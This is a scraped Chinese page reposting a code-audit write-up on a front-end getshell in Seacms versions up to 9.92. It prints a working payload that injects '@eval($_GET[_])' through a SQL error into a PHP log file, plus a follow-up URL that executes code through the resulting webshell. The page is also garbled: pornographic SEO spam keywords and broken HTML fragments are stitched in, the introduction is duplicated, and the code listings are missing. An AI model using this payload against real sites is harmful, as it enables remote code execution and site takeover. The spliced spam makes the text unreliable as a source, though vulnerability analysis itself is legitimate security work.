好久沒發(fā)代碼審計的文章了,最近挺多事情的,無意中看到90Sec上面有一篇seacms前臺的getshell,突然就很感興趣,之前審計這套程序的時候也審計了一下,后面太多事情就擱置了。

0x02 漏洞" />

国产成人精品无码青草_亚洲国产美女精品久久久久∴_欧美人与鲁交大毛片免费_国产果冻豆传媒麻婆精东

18143453325 在線咨詢 在線咨詢
18143453325 在線咨詢
所在位置: 首頁 > 營銷資訊 > 網(wǎng)站運營 > Seacms<=9.92前臺Getshell

Seacms<=9.92前臺Getshell

時間:2023-04-21 15:24:02 | 來源:網(wǎng)站運營

時間:2023-04-21 15:24:02 來源:網(wǎng)站運營

Seacms<=9.92前臺Getshell:0x01 前言

好久沒發(fā)代碼審計的文章了,最近挺多事情的,無意中看到90Sec上面有一篇seacms前臺的getshell,突然就很感興趣,之前審計這套程序的時候也審計了一下,后面太多事情就擱置了。

0x02 漏洞復(fù)現(xiàn)

環(huán)境是phpstudy(最近出后門新聞最火的那個),用著也挺方便的。PHP版本是5.x的。 payload:

http://127.0.0.1/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_]);?%3E


然后訪問:

http://127.0.0.1/data/mysqli_error_trace.php?_=phpinfo();





0x03 漏洞分析

關(guān)于這個SQL注入報錯的地方,在之前的8.7的一篇文章里面分析過了https://getpass.cn/2019/03/04/Seacms8.7-sql-injection-analysis/

主要的地方還是在于include/sql.class.php這個文件的465-489行







它會將sql報錯的信息寫入了一個PHP的文件里,那我們可以就可以讓sql語句報錯然后將惡意語句寫這個文件利用了。

0x04 結(jié)束

其實這個漏洞還挺簡單的,但是在其他的版本代碼是不一樣的,我測試了9.2的還有之前寫SQL注入的8.7版本都是不能利用的。主要代碼如下:




這里是說如果我們要刪除第476行的兩個反斜杠,然后才可以顯示報錯的內(nèi)容。我想是在很久之前的版本是直接寫入PHP文件的,但是后面作為更新了,就加上這段代碼,然后將之前的PHP存在的就刪除掉。 但是這個說是9.92版本出現(xiàn)的就很奇怪了。em...

文章測試的9.92版本程序下載地址:https://www.lanzous.com/i6eupwh

關(guān)鍵詞:前臺

74
73
25
news

版權(quán)所有? 億企邦 1997-2025 保留一切法律許可權(quán)利。

為了最佳展示效果,本站不支持IE9及以下版本的瀏覽器,建議您使用谷歌Chrome瀏覽器。 點擊下載Chrome瀏覽器
關(guān)閉